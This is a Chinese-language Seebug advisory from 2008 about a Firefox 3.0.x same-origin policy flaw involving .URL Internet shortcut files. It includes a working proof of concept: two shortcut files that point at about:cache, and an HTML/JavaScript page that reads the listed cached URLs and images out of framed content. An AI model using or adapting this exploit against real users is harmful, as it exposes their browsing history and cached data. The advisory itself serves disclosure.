Mozilla Firefox Internet快捷方式同源策略冲突漏洞

2008-10-09T00:00:00
ID SSV:4178
Type seebug
Reporter Root
Modified 2008-10-09T00:00:00

Description

BUGTRAQ ID: 31611 CNCAN ID:CNCAN-2008100802

Mozilla Firefox是一款开放源代码的WEB浏览器。 Mozilla Firefox处理Internet快捷文件时存在同源策略冲突问题,远程攻击者可以利用漏洞获得其他域中的敏感信息或进行其他攻击。 通过HTML元素运行的.URL快捷方式时Firefox的location是错误的,利用这个错误可导致任意位置的内容可被读取-缓存信息,COOKIE信息,WEB, 本地文件系统等。

Mozilla Firefox 3.0.3 Mozilla Firefox 3.0.2 Mozilla Firefox 3.0.1 目前没有解决方案提供: <a href=http://www.mozilla.com/en-US/ target=_blank>http://www.mozilla.com/en-US/</a>

                                        
                                            
                                                'testurl1.url':
[InternetShortcut]
URL=about:cache?device=memory
IDList=
[{000214A0-0000-0000-C000-000000000046}]
Prop3=19,2
'testurl2.url':
[InternetShortcut]
URL=about:cache?device=disk
IDList=
[{000214A0-0000-0000-C000-000000000046}]
Prop3=19,2
-----test.html-----
&lt;script&gt;
function a()
{
s=&quot;&quot;;
h=&quot;&quot;;
for(i=0;i&lt;window.frames.length;i++)
{
    d=window.frames[i].document;
    for(j=0;j&lt;d.links.length;j++)
    {
        u=d.links[j].text
        s+=u+&quot;\n&quot;;
        h+=&quot;&lt;img src=\&quot;&quot;+u+&quot;\&quot;&gt;&quot;;
    }
}
document.getElementById(&quot;t&quot;).value=s;
document.getElementById(&quot;x&quot;).innerHTML=h;
}
&lt;/script&gt;
&lt;a href=&quot;javascript:a();&quot;&gt;Start Test&lt;/a&gt;&lt;br&gt;
&lt;a href=&quot;javascript:window.location=location.href&quot;&gt;Load This Page Again&lt;/a&gt;&lt;br&gt;
&lt;br&gt;
&lt;br&gt;
&lt;b&gt;List of files that you recently fetched from the internet:&lt;/b&gt;&lt;br&gt;
&lt;textarea rows=&quot;10&quot; cols=&quot;100&quot; id=t wrap=off&gt;&lt;/textarea&gt;
&lt;br&gt;
&lt;br&gt;
&lt;b&gt;List of images that you recently viewed on the internet:&lt;/b&gt;&lt;br&gt;
&lt;div id=x&gt;&lt;/div&gt;
&lt;br&gt;
&lt;br&gt;
&lt;iframe width=300 height=200 src=&quot;testurl1.url&quot;&gt;&lt;/iframe&gt;
&lt;iframe width=300 height=200 src=&quot;testurl2.url&quot;&gt;&lt;/iframe&gt;